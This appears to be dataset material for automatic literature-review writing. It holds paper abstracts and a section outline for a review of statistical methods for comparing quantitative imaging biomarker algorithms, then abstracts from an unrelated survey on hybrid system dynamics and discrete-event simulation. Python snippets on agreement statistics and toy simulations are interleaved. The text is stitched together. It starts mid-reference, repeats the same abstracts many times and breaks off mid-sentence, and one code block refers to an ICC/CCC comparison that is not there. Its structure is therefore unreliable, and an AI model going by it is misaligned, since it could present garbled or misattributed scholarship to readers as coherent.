The Assessment of Bio-Equivalence. Appendix. References. Index --- paper_title: Measuring agreement in method comparison studies paper_content: Agreement between two methods of clinical measurement can be quantified using the differences between observations made using the two methods on the same subjects. The 95% limits of agreement, estimated by mean difference +/- 1.96 standard deviation of the differences, provide an interval within which 95% of differences between measurements by the two methods are expected to lie. We describe how graphical methods can be used to investigate the assumptions of the method and we also give confidence intervals. We extend the basic approach to data where there is a relationship between difference and magnitude, both with a simple logarithmic transformation approach and a new, more general, regression approach. We discuss the importance of the repeatability of each method separately and compare an estimate of this to the limits of agreement. We extend the limits of agreement approach to data with repeated measurements, proposing new estimates for equal numbers of replicates by each method on each subject, for unequal numbers of replicates, and for replicated data collected in pairs, where the underlying value of the quantity being measured is changing. Finally, we describe a nonparametric approach to comparing methods. --- paper_title: Regression Models for Method Comparison Data paper_content: Regression methods for the analysis of paired measurements produced by two fallible assay methods are described and their advantages and pitfalls discussed. The difficulties for the analysis, as in any errors-in-variables problem lies in the lack of identifiability of the model and the need to introduce questionable and often naive assumptions in order to gain identifiability. Although not a panacea, the use of instrumental variables and associated instrumental variable (IV) regression methods in this area of application has great potential to improve the situation. Large samples are frequently needed and two-phase sampling methods are introduced to improve the efficiency of the IV estimators. --- paper_title: The emerging science of quantitative imaging biomarkers terminology and definitions for scientific studies and regulatory submissions paper_content: The development and implementation of quantitative imaging biomarkers has been hampered by the inconsistent and often incorrect use of terminology related to these markers. Sponsored by the Radiological Society of North America, an interdisciplinary group of radiologists, statisticians, physicists, and other researchers worked to develop a comprehensive terminology to serve as a foundation for quantitative imaging biomarker claims. Where possible, this working group adapted existing definitions derived from national or international standards bodies rather than invent new definitions for these terms. This terminology also serves as a foundation for the design of studies that evaluate the technical performance of quantitative imaging biomarkers and for studies of algorithms that generate the quantitative imaging biomarkers from clinical scans. This paper provides examples of research studies and quantitative imaging biomarker claims that use terminology consistent with these definitions as well as examples... 
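As a concrete companion to the ICC and CCC comparison above, the sketch below computes a one-way ICC from the between- and within-subject mean squares together with Lin's concordance correlation coefficient for two methods. The blood-pressure-like values are invented, and the one-way (ICC1) form shown is only one of the ICC variants discussed in the cited work:

    import numpy as np

    x = np.array([120., 118., 135., 142., 128., 150., 131., 125.])   # method/rater 1 (illustrative)
    y = np.array([122., 115., 138., 140., 131., 149., 129., 128.])   # method/rater 2 (illustrative)

    data = np.column_stack([x, y])            # n subjects by k raters
    n, k = data.shape
    subject_means = data.mean(axis=1)
    grand_mean = data.mean()

    msb = k * ((subject_means - grand_mean) ** 2).sum() / (n - 1)        # between-subject mean square
    msw = ((data - subject_means[:, None]) ** 2).sum() / (n * (k - 1))   # within-subject mean square
    icc1 = (msb - msw) / (msb + (k - 1) * msw)

    sx2, sy2 = x.var(), y.var()               # Lin's CCC uses 1/n moment estimates
    sxy = ((x - x.mean()) * (y - y.mean())).mean()
    ccc = 2 * sxy / (sx2 + sy2 + (x.mean() - y.mean()) ** 2)

    print(f"ICC1 = {icc1:.3f}, CCC = {ccc:.3f}")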
--- paper_title: The Problem of Conversion in Method Comparison Studies paper_content: SUMMARY This paper introduces an extension of the well-known method comparison problem previously studied by Altman and Bland and others. The problem concerns the comparison of two approximate methods of measuring a quantity which return results expressed in different units. Such situations can arise where the methods in question proceed by measuring proxy quantities. Thus the data sets need to be converted to the same units before comparisons may take place. The paper presents an approach to this problem based on the theory of structural relationship models. This approach is applied to data gathered by two approximate methods of measuring the fuel consumption of motor vehicles. --- paper_title: Confidence Intervals on Nonnegative Linear Combinations of Variances paper_content: Abstract Smith (1936) suggested a method that can be used for setting confidence limits on linear combinations of variances. This method was studied and expanded by Satterthwaite (1941, 1946) and has become known as Satterthwaite's procedure. The procedure has been widely used for the past 40 years. In this article a new procedure is proposed for this problem that is better than Satterthwaite's procedure and very easy to compute from existing tables. --- paper_title: The emerging science of quantitative imaging biomarkers terminology and definitions for scientific studies and regulatory submissions paper_content: The development and implementation of quantitative imaging biomarkers has been hampered by the inconsistent and often incorrect use of terminology related to these markers. Sponsored by the Radiological Society of North America, an interdisciplinary group of radiologists, statisticians, physicists, and other researchers worked to develop a comprehensive terminology to serve as a foundation for quantitative imaging biomarker claims. Where possible, this working group adapted existing definitions derived from national or international standards bodies rather than invent new definitions for these terms. This terminology also serves as a foundation for the design of studies that evaluate the technical performance of quantitative imaging biomarkers and for studies of algorithms that generate the quantitative imaging biomarkers from clinical scans. This paper provides examples of research studies and quantitative imaging biomarker claims that use terminology consistent with these definitions as well as examples... --- paper_title: Applications of the repeatability of quantitative imaging biomarkers: a review of statistical analysis of repeat data sets. paper_content: Repeat imaging data sets performed on patients with cancer are becoming publicly available. The potential utility of these data sets for addressing important questions in imaging biomarker development is vast. In particular, these data sets may be useful to help characterize the variability of quantitative parameters derived from imaging. 
This article reviews statistical analysis that may be performed to use results of repeat imaging to 1) calculate the level of change in parameter value that may be seen in individual patients to confidently characterize that patient as showing true parameter change, 2) calculate the level of change in parameters value that may be seen in individual patients to confidently categorize that patient as showing true lack of parameter change, 3) determine if different imaging devices are interchangeable from the standpoint of repeatability, and 4) estimate the numbers of patients needed to precisely calculate repeatability. In addition, we recommend a set of statistical parameters that should be reported when the repeatability of continuous parameters is studied. --- paper_title: Assessing agreement between measurements recorded on a ratio scale in sports medicine and sports science. paper_content: OBJECTIVE ::: The consensus of opinion suggests that when assessing measurement agreement, the most appropriate statistic to report is the "95% limits of agreement". The precise form that this interval takes depends on whether a positive relation exists between the differences in measurement methods (errors) and the size of the measurements--that is, heteroscedastic errors. If a positive and significant relation exists, the recommended procedure is to report "the ratio limits of agreement" using log transformed measurements. This study assessed the prevalence of heteroscedastic errors when investigating measurement agreement of variables recorded on a ratio scale in sports medicine and sports science. ::: ::: ::: METHODS ::: Measurement agreement (or repeatability) was assessed in 13 studies (providing 23 examples) conducted in the Centre for Sport and Exercise Sciences at Liverpool John Moores University over the past five years. ::: ::: ::: RESULTS ::: The correlation between the absolute differences and the mean was positive in all 23 examples (median r = 0.37), eight being significant (P < 0.05). In 21 of 23 examples analysed, the correlation was greater than the equivalent correlation using log transformed measurements (median r = 0.01). Based on a simple meta-analysis, the assumption that no relation exists between the measurement differences and the size of measurement must be rejected (P < 0.001). ::: ::: ::: CONCLUSIONS ::: When assessing measurement agreement of variables recorded on a ratio scale in sports medicine and sports science, this study (23 examples) provides strong evidence that heteroscedastic errors are the norm. If the correlation between the absolute measurement differences and the means is positive (but not necessarily significant) and greater than the equivalent correlation using log transformed measurements, the authors recommend reporting the "ratio limits of agreement". ---
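The 95% limits of agreement described above (mean difference plus or minus 1.96 standard deviations of the differences), and the log-transformed "ratio limits of agreement" recommended for heteroscedastic ratio-scale data, can be computed in a few lines of Python; the paired measurements below are illustrative only:

    import numpy as np

    a = np.array([5.2, 7.9, 10.4, 14.8, 20.1, 26.5, 33.0, 41.2])   # method A (hypothetical)
    b = np.array([5.0, 8.3, 10.0, 15.6, 19.2, 27.8, 31.5, 43.0])   # method B (hypothetical)

    d = b - a
    loa = (d.mean() - 1.96 * d.std(ddof=1), d.mean() + 1.96 * d.std(ddof=1))

    log_d = np.log(b) - np.log(a)             # differences on the log scale
    ratio_loa = np.exp((log_d.mean() - 1.96 * log_d.std(ddof=1),
                        log_d.mean() + 1.96 * log_d.std(ddof=1)))

    print(f"bias = {d.mean():.2f}, 95% limits of agreement = ({loa[0]:.2f}, {loa[1]:.2f})")
    print(f"ratio limits of agreement = ({ratio_loa[0]:.3f}, {ratio_loa[1]:.3f})")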
Title: Quantitative Imaging Biomarkers: A Review of Statistical Methods for Computer Algorithm Comparisons
Section 1: Background and problem statement Description 1: This section introduces the utility of medical imaging in clinical settings and defines quantitative imaging biomarkers, outlining the focus of the paper on computer algorithms used to generate QIBs and the challenges associated with their evaluation and comparison.
Section 2: Study design issues for QIB algorithm comparisons Description 2: This section discusses the various design considerations for comparing QIB algorithms, including the types of studies, the importance of selecting appropriate measurement types, and the challenges related to human involvement and lack of true reference values.
Section 3: Testing superiority Description 3: This section details the statistical hypothesis testing framework for demonstrating the superiority of a new or upgraded QIB algorithm over a standard algorithm, including one-sided hypothesis tests and confidence interval approaches.
Section 4: Testing equivalence Description 4: This section explains the procedures for conducting equivalence tests, where researchers define appropriate equivalence limits to compare the performance of QIB algorithms against predefined thresholds.
Section 5: Testing non-inferiority (NI) Description 5: This section describes the methodology for demonstrating that a QIB algorithm is not inferior to a standard method by a predefined margin, often involving a stepwise approach to assess both non-inferiority and superiority.
Section 6: Evaluating performance when the true value or reference standard is present Description 6: This section discusses methods for assessing the closeness between QIB algorithm results and true values or reference standards, covering both disaggregated and aggregated approaches to evaluate bias and precision.
Section 7: Evaluating performance in the absence of the true value Description 7: This section reviews alternative approaches for assessing algorithm performance when true values are unavailable, including error-in-variable models and techniques that relax certain assumptions.
Section 8: Assessing bias with no clear reference standard Description 8: This section considers how to evaluate algorithm performance when no clear reference standard exists, focusing on symmetric consideration of all QIB algorithms under study.
Section 9: Nonlinearity and heteroscedasticity Description 9: This section addresses issues of heteroscedasticity and nonlinearity in the relationship between QIB measurements and the true values, and discusses nonparametric methods for dealing with these issues.
Section 10: Assessing the agreement among algorithms Description 10: This section explains the methods for assessing whether measurements from different QIB algorithms are sufficiently close to be considered interchangeable, emphasizing both scaled and unscaled measures of agreement.
Section 11: Evaluating algorithm precision Description 11: This section discusses methods for comparing the precision of QIB algorithms, including specific indices for repeatability and reproducibility and the appropriate statistical tests for these comparisons.
Section 12: Process for establishing the performance of QIB algorithms Description 12: This section outlines a seven-step process for validating the technical performance of QIB algorithms for clinical use or regulatory approval, covering aspects from definition and variability assessment to statistical testing.
Section 13: Discussion and recommendations Description 13: This section summarizes the key findings and provides recommendations for future research and development in the field of quantitative imaging biomarkers, emphasizing the importance of rigorous evaluation and validation methods.
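For the equivalence testing outlined in Section 4, a common implementation is the two one-sided tests (TOST) procedure on paired differences. The sketch below assumes a hypothetical equivalence margin and invented measurements; it is not taken from any of the cited studies:

    import numpy as np
    from scipy import stats

    margin = 0.5    # pre-specified equivalence limit, same units as the biomarker (assumed value)
    alpha = 0.05

    new_alg = np.array([10.1, 12.3, 9.8, 11.5, 10.9, 12.0, 11.2, 10.5])   # hypothetical
    std_alg = np.array([10.0, 12.5, 9.6, 11.8, 10.7, 12.2, 11.0, 10.6])   # hypothetical
    d = new_alg - std_alg
    n, mean_d = len(d), d.mean()
    se = d.std(ddof=1) / np.sqrt(n)
    df = n - 1

    t_lower = (mean_d + margin) / se          # H0: mean difference <= -margin
    t_upper = (mean_d - margin) / se          # H0: mean difference >= +margin
    p_lower = 1 - stats.t.cdf(t_lower, df)
    p_upper = stats.t.cdf(t_upper, df)

    equivalent = max(p_lower, p_upper) < alpha
    print(f"mean diff = {mean_d:.3f}, p_lower = {p_lower:.4f}, p_upper = {p_upper:.4f}, "
          f"equivalent within +/-{margin}: {equivalent}")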
COMBINING SYSTEM DYNAMICS AND DISCRETE EVENT SIMULATIONS - OVERVIEW OF HYBRID SIMULATION MODELS
11
--- paper_title: Discrete-event simulation: from the pioneers to the present, what next? paper_content: Discrete-event simulation is one of the most popular modelling techniques. It has developed significantly since the inception of computer simulation in the 1950s, most of this in line with developments in computing. The progress of simulation from its early days is charted with a particular focus on recent history. Specific developments in the past 15 years include visual interactive modelling, simulation optimization, virtual reality, integration with other software, simulation in the service sector, distributed simulation and the use of the worldwide web. The future is then speculated upon. Potential changes in model development, model use, the domain of application for simulation and integration with other simulation approaches are all discussed. The desirability of continuing to follow developments in computing, without significant developments in the wider methodology of simulation, is questioned. --- paper_title: Semiconductor supply network simulation paper_content: More efficient and effective control of supply networks is conservatively worth billions of dollars to the national and world economy. Developing improved control requires simulation of physical flows of materials involved and decision policies governing these flows. We describe our initial work on modelling each of these flows as well as simulating their integration through the synchronized interchange of data. We show the level of abstraction that is appropriate, formulate and test a representative model, and describe our findings and conclusions. --- paper_title: An Approach to a Hybrid Software Process Simulation using the DEVS Formalism paper_content: This article proposes an approach to a hybrid software process simulation modeling (SPSM) using discrete event system specification (DEVS) formalism, which implements the dynamic structure and discrete characteristics of the software development process. Many previous researchers on hybrid SPSM have described both discrete and continuous aspects of the software development process to provide more realistic simulation models. The existing hybrid models, however, have not fully implemented the feedback loop mechanism of the system dynamics. We define the DEVS Hybrid SPSM formalism by extending DEVS to the hybrid SPSM domain. Our hybrid SPSM approach uses system dynamics modeling to convey details concerning activity behaviors and managerial policies, while discrete event modeling controls activity start/completion and sequence. This approach also provides a clear specification, an explicit extension point to extend the simulation model, and a reuse mechanism. We will demonstrate a Waterfall-like hybrid software process simulation model using the DEVS Hybrid SPSM formalism. Copyright  2006 John Wiley & Sons, Ltd. --- paper_title: Discrete-Event System Simulation paper_content: This book provides a basic treatment of one of the most widely used operations research tools: discrete-event simulation. Prerequisites are calculus, probability theory, and elementary statistics. Contents, abridged: Introduction to discrete-event system simulation. Mathematical and statistical models. Random numbers. Analysis of simulation data. Index. --- paper_title: Simulation Modeling and Analysis paper_content: From the Publisher: ::: This second edition of Simulation Modeling and Analysis includes a chapter on "Simulation in Manufacturing Systems" and examples. 
The text is designed for a one-term or two-quarter course in simulation offered in departments of industrial engineering, business, computer science, and operations research. --- paper_title: Comparing Discrete Simulation and System Dynamics: Modeling an Anti-Insurgency Influence Operation paper_content: This paper contrasts the tradeoffs of modeling the same dynamic problem at a micro scale and at a macro scale of analysis: discrete system simulation (DS) versus continuous system simulation or system dynamics (SD). Both are employed to model the influence of entertainment education on terrorist system decay, with implications for field application. Each method optimizes different design, scope/scale, data availability/accuracy, parameter settings, and system sensitivities. Whether the research served by the computer model is applied or theoretical, DS tends to be useful for understanding low-level individual unit/step influences on system change over time, whereas SD tends to shine when a wide-angle focus upon sociological/aggregate change is required. --- paper_title: Utilizing simulation to evaluate business decisions in sense-and-respond systems paper_content: Simulation can be an effective way to evaluate alternative decisions in sense-and-respond systems prior to taking actions to resolve existing or anticipated business situations. In sense-and-respond systems, business situations arise within predefined contexts that specify what aspects of the business need to be monitored and what information is needed to make decisions. We have designed a decision support system that dynamically configures simulation models based on business context and interactively presents simulation results to business analysts. In this paper, our decision support system is applied to the IBM demand conditioning process, in which mismatches between supply and demand are identified and corrective actions are initiated. --- paper_title: Enterprise simulation: a hybrid system approach paper_content: Manufacturing enterprise decisions can be classified into four groups: business decisions, design decisions, engineering decisions, and production decisions. Numerous physical and software simulation techniques have been used to evaluate specific decisions by predicting their impact on either system performance or product performance. In this paper, we focus on the impact of production decisions, evaluated using discrete-event-simulation models, on enterprise-level performance measures. We argue that these discrete-event models alone are not enough to capture this impact. --- paper_title: Strategic-Operational Construction Management: Hybrid System Dynamics and Discrete Event Approach paper_content: A significant number of large-scale civil infrastructure projects experience cost overruns and schedule delays. To minimize these disastrous consequences, management actions need to be carefully examined at both the strategic and operational levels, as their effectiveness is mainly dependent on how well strategic perspectives and operational details of a project are balanced.
However, current construction project management approaches have treated the strategic and operational issues separately, and consequently introduced a potential conflict between strategic and operational analyses. To address this issue, a hybrid simulation model is presented in this paper. This hybrid model combines system dynamics and discrete event simulation which have mainly been utilized to analyze the strategic and operational issues in isolation, respectively. As an application example, a nontypical repetitive earthmoving process is selected and simulated. The simulation results demonstrate that a systematic integration of strategic perspective and operational details is helpful to enhance the process performance by enabling construction managers to identify potential process improvement areas that traditional approaches may miss. Based on the simulation results, it is concluded that the proposed hybrid simulation model has great potential to support both the strategic and operational aspects of construction project management and to ultimately help increase project performance. --- paper_title: Hybrid System Dynamics and Discrete Event Simulation for Construction Management paper_content: Simulations have significantly contributed to the analysis of construction, and Discrete Event Simulation has been a primary means of simulation focusing on Construction Operation. In this paper, the authors address the importance of Construction Context as another realm for understanding and managing construction through representation of overall behavior of construction associated with Construction Operation. The issues raised from representing both Construction Operation and Construction Context together in a simulation model are discussed, and a hybrid System Dynamics and Discrete Event Simulation approach is proposed as a comprehensive simulation framework for that purpose. Briefly, its application to construction is also discussed. --- paper_title: Applicability of hybrid simulation to different modes of governance in UK healthcare paper_content: Healthcare organizations exhibit both detailed and dynamic complexity. Effective and sustainable decision-making in healthcare requires tools that can comprehend this complexity. Discrete event simulation (DES) due to its ability to capture detail complexity is widely used for operational decision making. However at the strategic level, System Dynamics (SD) with its focus on a holistic perspective and its ability to comprehend dynamic complexity has advantages over DES. Appreciating the complexity of healthcare, the authors have proposed the use of hybrid simulation in healthcare. As argued previously, effective decision making require tools which are capable of comprehending both detail and dynamic interactions of healthcare. The interactions in the organizations are governed by the governance design. In appreciation of that argument the authors have described the applicability of a hybrid approach to various modes of governance in UK healthcare. --- paper_title: MODELING ARCHITECTURE FOR HYBRID SYSTEM DYNAMICS AND DISCRETE EVENT SIMULATION paper_content: Construction systems and projects comprise complex combinations of subsystems, processes, operations, and activities. Discrete Event Simulation (DES) has been used extensively for modeling construction systems, addressing system complexity, and analyzing system behavior. 
However, while DES is a powerful tool for capturing operations as they occur in reality, DES does have difficulty modeling context and its mutual effects on the operational components of a system. System Dynamics (SD), on the other hand, captures feedback loops that are derived from the context level of a system and that can anticipate system behavior; nevertheless, SD cannot effectively model the operational parts of a system. Hybrid SD and DES modeling provide a set of tools that use the capabilities, while improving upon the disadvantages, of these two approaches. Although initial efforts to develop hybrid SD-DES modeling dates back to the late 1990s, in the construction industry, there are relatively few studies in this area, and there is still no robust architecture for hybrid system developers. This paper addresses these issues by proposing a comprehensive hybrid simulation architecture based on the High Level Architecture (HLA) infrastructure, which can be used by hybrid simulation developers in the construction industry. A typical steel fabrication shop has been modeled based on the proposed architecture, and it has been compared with the ideally developed hybrid simulation architecture. --- paper_title: Hybrid system dynamic—discrete event simulation-based architecture for hierarchical production planning paper_content: Multi-plant production planning problem deals with the determination of type and quantity of products to produce at the plants over multiple time periods. Hierarchical production planning provides a formal bridge between long-term plans and short-term schedules. A hybrid simulation-based hierarchical production planning architecture consisting of system dynamics (SD) components for the enterprise level planning and discrete event simulation (DES) components for the shop-level scheduling is presented. The architecture consists of the Optimizer, Performance Monitor and Simulator modules at each decision level. The Optimizers select the optimal set of control parameters based on the estimated behaviour of the system. The enterprise-level simulator (SD model) and shop-level simulator (DES model) interact with each other to evaluate the plan. Feedback control loops are employed at each level to monitor the performance and update the control parameters. Functional and process models of the proposed architecture... --- paper_title: Application of a hybrid process simulation model to a software development project paper_content: Abstract Simulation models of the software development process can be used to evaluate potential process changes. Careful evaluation should consider the change within the context of the project environment. While system dynamics models have been used to model the project environment, discrete event and state-based models are more useful when modeling process activities. Hybrid models of the software development process can examine questions that cannot be answered by either system dynamics models or discrete event models alone. In this paper, we present a detailed hybrid model of a software development process currently in use at a major industrial developer. We describe the model and show how the model was used to evaluate simultaneous changes to both the process and the project environment. --- paper_title: Hierarchical production planning using a hybrid system dynamic-discrete event simulation architecture paper_content: Hierarchical production planning provides a formal bridge between long-term plans and short-term schedules. 
A hybrid simulation-based production planning architecture consisting of system dynamics (SD) components at the higher decision level and discrete event simulation (DES) components at the lower decision level is presented. The need for the two types of simulation has been justified. The architecture consists of four modules: enterprise-level decision maker, SD model of enterprise, shop-level decision maker and DES model of shop. The decision makers select the optimal set of control parameters based on the estimated behavior of the system. These control parameters are used by the SD and DES models to determine the best plan based on the actual behavior of the system. High level architecture has been employed to interface SD and DES simulation models. Experimental results from a single-product manufacturing enterprise demonstrate the validity and scope of the proposed approach. --- paper_title: Enterprise scheduling: Hybrid and hierarchical issues paper_content: We build a hybrid discrete-continuous simulation model of the manufacturing enterprise system. This model consists of an overall system dynamics model of the manufacturing enterprise and connected to it are a number of discrete event simulations for selected operational and tactical functions. System dynamics modeling best fits the macroscopic nature of activities at the higher management levels while the discrete models best fit the microscopic nature of the operational and tactical levels. An advanced mechanism based on information theory is used for the integration of the different simulation modeling modalities. In addition, the impact of the decisions at the factory level in scheduling are analyzed at the management level. The different models of control are discussed. --- paper_title: Integrating agent-based simulation and system dynamics to support product strategy decisions in the automotive industry paper_content: Especially in the European Union both, regulatory requirements regarding the CO2 emissions of new vehicles and the shortage of crude oil force car manufacturers to introduce alternative fuel and powertrain concepts. Due to high investments and long development times as well as the parallel offer of conventional and alternative technologies, an appropriate product strategy is required. Car manufacturers have to decide, which powertrain to introduce at which time in which vehicle class. Hence, the aim of this paper is to develop a framework for the analysis of product strategies in the automotive industry with special regard to alternative fuel and powertrain technologies. The framework integrates System Dynamics and Agent-based Simulation in a simulation environment. On basis of this analysis recommendations can be deduced concerning the implementation of different product portfolios. --- paper_title: Towards the holy grail: Combining system dynamics and discrete-event simulation in healthcare paper_content: The idea of combining discrete-event simulation and system dynamics has been a topic of debate in the operations research community for over a decade. Many authors have considered the potential benefits of such an approach from a methodological or practical standpoint. However, despite numerous examples of models with both discrete and continuous parameters in the computer science and engineering literature, nobody in the OR field has yet succeeded in developing a genuinely hybrid approach which truly integrates the philosophical approach and technical merits of both DES and SD in a single model. 
In this paper we consider some of the reasons for this and describe two practical healthcare examples of combined DES/SD models, which nevertheless fall short of the "holy grail" which has been so widely discussed in the literature over the past decade. --- paper_title: The high level architecture: is there a better way? paper_content: This paper first discusses the basic design approach adopted for the High Level Architecture and the design goals that it addresses in the military simulation arena. Next, the limitations of this architecture are discussed with particular focus on the real-time information requirements needed to support its operation. Finally, the paper discusses HLA's inability to model complex systems with hierarchical command and control structures and the inherent limitations that this deficiency will impose upon the application of futuristic simulation technologies to military applications. --- paper_title: MODELING ARCHITECTURE FOR HYBRID SYSTEM DYNAMICS AND DISCRETE EVENT SIMULATION paper_content: Construction systems and projects comprise complex combinations of subsystems, processes, operations, and activities. Discrete Event Simulation (DES) has been used extensively for modeling construction systems, addressing system complexity, and analyzing system behavior. However, while DES is a powerful tool for capturing operations as they occur in reality, DES does have difficulty modeling context and its mutual effects on the operational components of a system. System Dynamics (SD), on the other hand, captures feedback loops that are derived from the context level of a system and that can anticipate system behavior; nevertheless, SD cannot effectively model the operational parts of a system. Hybrid SD and DES modeling provide a set of tools that use the capabilities, while improving upon the disadvantages, of these two approaches. Although initial efforts to develop hybrid SD-DES modeling dates back to the late 1990s, in the construction industry, there are relatively few studies in this area, and there is still no robust architecture for hybrid system developers. This paper addresses these issues by proposing a comprehensive hybrid simulation architecture based on the High Level Architecture (HLA) infrastructure, which can be used by hybrid simulation developers in the construction industry. A typical steel fabrication shop has been modeled based on the proposed architecture, and it has been compared with the ideally developed hybrid simulation architecture. --- paper_title: On-line data processing in simulation models: New approaches and possibilities through HLA paper_content: The United States Department of Defense's High Level Architecture for Modeling and Simulation (HLA) provides a standardized interface for distributed simulations. The recent advent of HLA has greatly increased interest in the use of distributed, interoperable simulation model components. This paper focuses on how on-line data (i.e. data from real-time dependent processes) can be used in analytical simulation models and how the use of HLA based components can facilitate the integration of this kind of data into simulations. The paper also discusses the issue of cloning federates and federations and introduces some potential applications of cloning for a public transportation prototype example. 
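A minimal sketch of the kind of coupling these hybrid models describe, interleaving an Euler-integrated (system-dynamics-style) stock update with a time-ordered list of discrete events that switch a model parameter. It is tool-agnostic (not an AnyLogic or HLA implementation), and all rates and times are invented:

    import heapq

    # A continuous "backlog" stock drained at a rate that discrete events
    # (capacity changes) switch between two levels. All values are hypothetical.
    events = [(2.0, "capacity_down"), (5.0, "capacity_up")]   # (time, event) pairs
    heapq.heapify(events)

    t, dt, t_end = 0.0, 0.1, 8.0
    backlog, inflow, service_rate = 50.0, 4.0, 6.0

    while t < t_end:
        # 1) handle any discrete events scheduled up to the current time
        while events and events[0][0] <= t:
            _, ev = heapq.heappop(events)
            service_rate = 2.0 if ev == "capacity_down" else 6.0
        # 2) advance the continuous (system-dynamics-style) state by one Euler step
        outflow = min(service_rate, backlog / dt)      # stock cannot be drained below zero
        backlog += (inflow - outflow) * dt
        t += dt

    print(f"backlog at t={t_end}: {backlog:.1f}")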
--- paper_title: Hierarchical production planning using a hybrid system dynamic-discrete event simulation architecture paper_content: Hierarchical production planning provides a formal bridge between long-term plans and short-term schedules. A hybrid simulation-based production planning architecture consisting of system dynamics (SD) components at the higher decision level and discrete event simulation (DES) components at the lower decision level is presented. The need for the two types of simulation has been justified. The architecture consists of four modules: enterprise-level decision maker, SD model of enterprise, shop-level decision maker and DES model of shop. The decision makers select the optimal set of control parameters based on the estimated behavior of the system. These control parameters are used by the SD and DES models to determine the best plan based on the actual behavior of the system. High level architecture has been employed to interface SD and DES simulation models. Experimental results from a single-product manufacturing enterprise demonstrate the validity and scope of the proposed approach. --- paper_title: Supply chain and hybrid modeling: The Panama Canal operations and its salinity diffusion paper_content: This paper deals with the simulation modeling of the service supply chain and the salinity and its diffusion in the Panama Canal. An operational supply chain model was created using discrete-event simulation. Once complete, a component based on differential equations was added to the model to investigate the intrusion of salt and the resulting salinity diffusion into the lakes of the canal. This component was implemented in the AnyLogic simulation modeling environment by taking advantage of the concept of hybrid modeling that is embedded in AnyLogic. --- paper_title: Towards the holy grail: Combining system dynamics and discrete-event simulation in healthcare paper_content: The idea of combining discrete-event simulation and system dynamics has been a topic of debate in the operations research community for over a decade. Many authors have considered the potential benefits of such an approach from a methodological or practical standpoint. However, despite numerous examples of models with both discrete and continuous parameters in the computer science and engineering literature, nobody in the OR field has yet succeeded in developing a genuinely hybrid approach which truly integrates the philosophical approach and technical merits of both DES and SD in a single model. In this paper we consider some of the reasons for this and describe two practical healthcare examples of combined DES/SD models, which nevertheless fall short of the "holy grail" which has been so widely discussed in the literature over the past decade. --- paper_title: Enterprise simulation: a hybrid system approach paper_content: Manufacturing enterprise decisions can be classified into four groups: business decisions, design decisions, engineering decisions, and production decisions. Numerous physical and software simulation techniques have been used to evaluate specific decisions by predicting their impact on either system performance or product performance. In this paper, we focus on the impact of production decisions, evaluated using discrete-event-simulation models, on enterprise-level performance measures. We argue that these discrete-event models alone are not enough to capture this impact. 
To address this problem, we propose integrating discrete-event simulation models with system dynamics models in a hybrid approach to the simulation of the entire enterprise system. This hybrid approach is conceptually consistent with current business trend toward integrated systems. We show the potentials for using this approach through an example of a semiconductor enterprise. --- paper_title: Application of a hybrid process simulation model to a software development project paper_content: Abstract Simulation models of the software development process can be used to evaluate potential process changes. Careful evaluation should consider the change within the context of the project environment. While system dynamics models have been used to model the project environment, discrete event and state-based models are more useful when modeling process activities. Hybrid models of the software development process can examine questions that cannot be answered by either system dynamics models or discrete event models alone. In this paper, we present a detailed hybrid model of a software development process currently in use at a major industrial developer. We describe the model and show how the model was used to evaluate simultaneous changes to both the process and the project environment. --- paper_title: Hierarchical production planning using a hybrid system dynamic-discrete event simulation architecture paper_content: Hierarchical production planning provides a formal bridge between long-term plans and short-term schedules. A hybrid simulation-based production planning architecture consisting of system dynamics (SD) components at the higher decision level and discrete event simulation (DES) components at the lower decision level is presented. The need for the two types of simulation has been justified. The architecture consists of four modules: enterprise-level decision maker, SD model of enterprise, shop-level decision maker and DES model of shop. The decision makers select the optimal set of control parameters based on the estimated behavior of the system. These control parameters are used by the SD and DES models to determine the best plan based on the actual behavior of the system. High level architecture has been employed to interface SD and DES simulation models. Experimental results from a single-product manufacturing enterprise demonstrate the validity and scope of the proposed approach. --- paper_title: Towards the holy grail: Combining system dynamics and discrete-event simulation in healthcare paper_content: The idea of combining discrete-event simulation and system dynamics has been a topic of debate in the operations research community for over a decade. Many authors have considered the potential benefits of such an approach from a methodological or practical standpoint. However, despite numerous examples of models with both discrete and continuous parameters in the computer science and engineering literature, nobody in the OR field has yet succeeded in developing a genuinely hybrid approach which truly integrates the philosophical approach and technical merits of both DES and SD in a single model. In this paper we consider some of the reasons for this and describe two practical healthcare examples of combined DES/SD models, which nevertheless fall short of the "holy grail" which has been so widely discussed in the literature over the past decade. 
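The hierarchical feedback described in the production planning architecture above, an enterprise-level stock-adjustment rule passing a target down to a shop-level discrete model and receiving realized output back, can be caricatured as follows. The single-machine shop model and all parameters are invented stand-ins, not the cited HLA-based implementation:

    import random

    def shop_des(target, period_length=40.0, mean_proc=1.2, seed=0):
        # Toy stand-in for the shop-level DES: one machine processes jobs with
        # exponential times until the period ends; returns jobs actually finished.
        rng = random.Random(seed)
        clock, completed = 0.0, 0
        while completed < int(target):
            clock += rng.expovariate(1.0 / mean_proc)
            if clock > period_length:
                break
            completed += 1
        return completed

    # Enterprise-level (system-dynamics-style) loop: an inventory stock is adjusted
    # toward a coverage goal, the production target is passed down, and the realized
    # shop output is fed back. All parameters are invented.
    inventory, demand, desired_coverage = 20.0, 30.0, 1.0
    for period in range(5):
        target = demand + (desired_coverage * demand - inventory)   # stock-adjustment rule
        produced = shop_des(target, seed=period)
        inventory += produced - demand
        print(f"period {period}: target={target:.0f} produced={produced} inventory={inventory:.0f}")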
--- paper_title: Enterprise simulation: a hybrid system approach paper_content: Manufacturing enterprise decisions can be classified into four groups: business decisions, design decisions, engineering decisions, and production decisions. Numerous physical and software simulation techniques have been used to evaluate specific decisions by predicting their impact on either system performance or product performance. In this paper, we focus on the impact of production decisions, evaluated using discrete-event-simulation models, on enterprise-level performance measures. We argue that these discrete-event models alone are not enough to capture this impact. To address this problem, we propose integrating discrete-event simulation models with system dynamics models in a hybrid approach to the simulation of the entire enterprise system. This hybrid approach is conceptually consistent with current business trend toward integrated systems. We show the potentials for using this approach through an example of a semiconductor enterprise. --- paper_title: Application of a hybrid process simulation model to a software development project paper_content: Abstract Simulation models of the software development process can be used to evaluate potential process changes. Careful evaluation should consider the change within the context of the project environment. While system dynamics models have been used to model the project environment, discrete event and state-based models are more useful when modeling process activities. Hybrid models of the software development process can examine questions that cannot be answered by either system dynamics models or discrete event models alone. In this paper, we present a detailed hybrid model of a software development process currently in use at a major industrial developer. We describe the model and show how the model was used to evaluate simultaneous changes to both the process and the project environment. --- paper_title: Hierarchical production planning using a hybrid system dynamic-discrete event simulation architecture paper_content: Hierarchical production planning provides a formal bridge between long-term plans and short-term schedules. A hybrid simulation-based production planning architecture consisting of system dynamics 